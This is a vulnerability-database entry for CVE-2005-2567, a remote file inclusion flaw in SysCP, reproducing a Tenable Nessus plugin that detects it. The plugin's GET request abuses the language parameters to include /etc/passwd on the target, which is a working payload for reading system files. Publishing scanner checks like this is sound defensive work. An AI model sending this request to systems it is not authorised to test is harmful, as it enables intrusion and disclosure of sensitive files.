Vulnerabilities > CVE-2005-2567 - Remote Security vulnerability in Syscp

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
syscp-team
nessus

Summary

PHP remote file inclusion vulnerability in SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via the language parameter.

Vulnerable Configurations

Part Description Count
Application
Syscp_Team
1

Nessus

NASL familyCGI abuses
NASL idSYSCP_1211.NASL
descriptionThe remote host is running SysCP, an open source control panel written in PHP. The version of SysCP installed on the remote host uses user-supplied input to several variables in various scripts without sanitizing it. Provided PHP
last seen2020-06-01
modified2020-06-02
plugin id19417
published2005-08-10
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19417
titleSysCP < 1.2.11 Multiple Script Command Execution Vulnerabilities
code
#
# (C) Tenable Network Security
#

include("compat.inc");

if (description) {
  script_id(19417);
  script_version("1.16");
  script_cve_id("CVE-2005-2568", "CVE-2005-2567");
  script_bugtraq_id(14490);

  script_name(english:"SysCP < 1.2.11 Multiple Script Command Execution Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by remote
code execution vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running SysCP, an open source control panel written
in PHP. 

The version of SysCP installed on the remote host uses user-supplied
input to several variables in various scripts without sanitizing it. 
Provided PHP's 'register_globals' setting is enabled, an attacker can
exploit these flaws to pass arbitrary PHP code to the application's
internal template engine for execution or to affect the application's
use of include files." );
 script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_132005.64.html" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to SysCP version 1.2.11 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/10");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/04");
 script_cvs_date("Date: 2018/08/01 17:36:12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:syscp_team:syscp");
script_end_attributes();

 
  script_summary(english:"Checks for multiple script execution vulnerabilities in SysCP < 1.2.11");
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the file include flaw.
  w = http_send_recv3(method:"GET",
    item:string(
      dir, "/index.php?",
      "action=login&",
      "languages[Nessus]=", SCRIPT_NAME, "&",
      "language=Nessus&",
      "langs[Nessus][0][file]=/etc/passwd"
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if we get the password file.
  if (egrep(string:res, pattern:"root:.*:0:[01]:")) {
    security_hole(port);
    exit(0);
  }
}